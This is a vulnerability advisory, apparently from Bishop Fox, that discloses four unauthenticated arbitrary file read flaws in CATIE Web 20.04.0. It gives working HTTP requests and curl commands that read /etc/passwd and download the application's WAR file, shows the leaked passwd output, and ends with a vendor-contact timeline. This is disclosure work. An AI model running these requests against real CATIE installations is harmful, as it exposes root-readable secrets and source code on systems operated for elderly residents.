CATIE Web - Version 20.04.0
CATIE WEB ADVISORY SUMMARY
The following document describes identified vulnerabilities in the CATIE Web application version 20.04.0.
According to the official product documentation, CATIE Web is “a communication, self-service and resident engagement software that helps seniors connect with their community” while also “keeping staff informed about residents’ needs on a daily basis.” The project’s official website is https://www.statussolutions.com/resident-engagement-catie. The latest version of the application is 21.06.0.
Four local file disclosure vulnerabilities were identified within the CATIE Web application. These vulnerabilities are described in the following sections.
Summary of Findings
CATIE Web version 20.04 is vulnerable to four local file disclosure vulnerabilities, which enable an unauthenticated remote attacker to read arbitrary files via four separate application endpoints.
An attacker could leverage these vulnerabilities to read or download any file on the host, as the vulnerable service has root privileges. Accessible files may include application source code, password hashes, and cleartext secrets in configuration files. With this level of access, an attacker could likely gain access to the application and eventually compromise the host.
As of this writing, the vulnerabilities described have not been remediated.
LOCAL FILE DISCLOSURE
The CATIE Web application was affected by four local file disclosure vulnerabilities via the application’s endpoints. These vulnerabilities allowed all files to be read on the file system, as the vulnerable service was running with root permissions, and could be exploited remotely without authentication.
The assessment team used the
/catie/MultiPartUtilityServlet API endpoint to craft a request and successfully retrieved the
/etc/passwd file, as shown below:
GET /catie/MultiPartUtilityServlet?file=/passwd&dir=/etc HTTP/1.1 Host: [REDACTED] ...omitted for brevity...
HTTP/1.1 200 200 ...omitted for brevity... root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash Demo:x:500:500::/home/Demo:/bin/bash tcpdump:x:72:72::/:/sbin/nologin support:x:501:501::/home/support:/bin/bash ladmin:x:502:502::/home/ladmin:/bin/bash
The vulnerable service was running as
root and the team identified the location of the
catie.war web application deployment file via the
.bash_history file, downloaded it using the arbitrary file read, and extracted the file to access the source code:
$ curl -sk 'https://[REDACTED]/catie/MultiPartUtilityServlet?file=catie.war&dir=/home/apache-tomcat/webapps/' --output catie.war $ unzip catie.war ...omitted for brevity... $ ls admin appadmin catie.war device global META-INF sara WEB-INF
The team performed a cursory code review of the application and identified three additional arbitrary file read vulnerabilities at the following locations:
$ curl -sk 'https://[REDACTED]/catie/ImageGrabberServlet?imageName=/passwd&imageDir=/etc' $ curl -sk 'https://[REDACTED]/catie/AudioStream?file=/etc/passwd' $ curl -sk 'https://[REDACTED]/catie/device/carousel/tv/Filewriter?filename=/etc/passwd'
- Nate Robb, Adversarial Operator, Bishop Fox ([email protected])
- Dan Ritter, Adversarial Operator, Bishop Fox ([email protected])
- 04/12/2021: Initial vulnerability discovery
- 04/28/2021: Initial attempted contact with vendor via email, no response
- 4/30/2021: Second attempted contact with vendor via email, no response
- 5/06/2021: Messaged Status Solutions Facebook account to inquire about a security contact for disclosure, no response
- 5/27/2021: Called number listed on Status Solutions website (866-846-7272), received voice mailbox
- 6/02/2021: Emailed technical manager in charge of CATIE Web directly, no response
- 6/09/2021: Sent second email to technical manager in charge of CATIE Web directly, no response
- 8/25/2021: Spoke to lead developer via phone, sent PoC details in email
- 12/02/2021: Advisory published
Subscribe to Bishop Fox's Security Blog
Be first to learn about latest tools, advisories, and findings.
Thank You! You have been subscribed.